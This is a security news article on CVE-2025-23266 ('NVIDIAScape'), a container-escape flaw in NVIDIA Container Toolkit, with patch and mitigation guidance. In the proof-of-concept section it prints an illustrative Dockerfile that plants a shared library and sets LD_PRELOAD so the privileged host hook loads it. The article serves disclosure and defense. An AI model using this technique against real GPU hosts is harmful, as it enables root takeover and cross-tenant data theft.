Critical NVIDIA Container Toolkit Bug Lets Attackers Break Out of AI Containers

New flaw threatens the backbone of GPU‑powered cloud services

Cloud‑security firm Wiz has uncovered a serious weakness in the NVIDIA Container Toolkit (NCT) that could let a malicious container jump its fence and seize control of the underlying server. The issue, logged as CVE‑2025‑23266 and nicknamed “NVIDIAScape,” carries a critical CVSS score of 9.0, signalling that exploitation is both straightforward and damaging. NVIDIA confirmed the problem in a security bulletin and has released fixes, yet many hosts remain exposed because the vulnerable code sits at the heart of most managed AI and GPU offerings run by the major cloud providers.

What exactly went wrong?

The Container Toolkit is the small but crucial layer that lets a Linux container talk to NVIDIA GPUs. During start‑up, it registers an OCI “createContainer” hook that runs with elevated rights on the host. Wiz researchers noticed that this hook inherits the environment variables supplied by the user’s container image. Because the Linux dynamic loader honours LD_PRELOAD in any process it launches, an attacker can set that variable to point at a shared library smuggled into the image, tricking the privileged hook into loading untrusted code before it runs a single instruction of its own. That design slip is all it takes for a container to burst through its namespace walls and grab root on the machine.

A three‑line Dockerfile is enough

In a proof‑of‑concept, Wiz showed that adding just three lines to a Dockerfile—copying a rogue .so file and setting LD_PRELOAD—is enough to trigger the escape. Because the hook’s working directory is the container’s root filesystem, no fancy path traversal is required; the library sits where the hook can reach it. Once loaded, the attacker’s code runs as the host’s root user, paving the way to install backdoors, exfiltrate data or tamper with other workloads. Wiz estimates that roughly 37 percent of cloud environments contain the vulnerable toolkit, meaning a sizable share of AI tenants could be at risk if a single customer turns hostile.
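The general shape of such a Dockerfile is easy to picture; the base image and library name below are illustrative stand‑ins, not Wiz’s actual proof‑of‑concept:

```dockerfile
FROM busybox
# Ship a malicious shared library inside the image's root filesystem.
COPY poc.so /poc.so
# The privileged createContainer hook inherits this variable; because the
# hook's working directory is the container's rootfs, the relative path
# resolves to the library placed above.
ENV LD_PRELOAD=./poc.so
```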

Why AI clouds feel the heat

GPU‑backed services typically pack many customers onto the same physical hardware to keep utilisation high. If one container breaks loose, every other tenant’s training data, fine‑tuned models and intellectual property stored on that host are suddenly exposed. The discovery echoes previous NCT bugs—such as CVE‑2024‑0132 and CVE‑2025‑23359—that allowed full host takeovers and highlights a pattern: classic “infrastructure” flaws often pose a more immediate threat to AI workloads than futuristic model‑level attacks. As Wiz puts it, containers offer convenience, not strong security boundaries, and multi‑tenant platforms should assume that escape bugs will surface again.

Patches and work‑arounds

NVIDIA has shipped Container Toolkit 1.17.8 and GPU Operator 25.3.1, which close the hole by tightening how hooks are invoked. Operators unable to upgrade right away can reduce risk by disabling the enable‑cuda‑compat hook through a simple config flag or Helm override; doing so removes the vulnerable path entirely, though at the cost of certain compatibility features. Both NVIDIA and Wiz urge cloud providers to patch urgently, especially on hosts that let customers supply their own images.
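For operators who cannot upgrade yet, the mitigation amounts to switching the vulnerable hook off in the toolkit’s configuration. A sketch of the idea follows; the file path and key name are based on NVIDIA’s published guidance, so confirm them against the advisory for your toolkit version before applying:

```toml
# /etc/nvidia-container-toolkit/config.toml
[features]
disable-cuda-compat-lib-hook = true
```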

A reminder to layer defenses

NVIDIAScape reinforces an old lesson: rely on more than one wall. Virtual machines, micro‑VMs or hardware‑based isolation can prevent a single container bug from turning into a cross‑tenant breach. As AI adoption accelerates, the low‑level plumbing that couples containers, drivers and GPUs will keep expanding—and so will its attack surface. Staying ahead means treating that plumbing with the same scrutiny traditionally reserved for application code and applying defense‑in‑depth so that the next surprise flaw is a nuisance, not a crisis.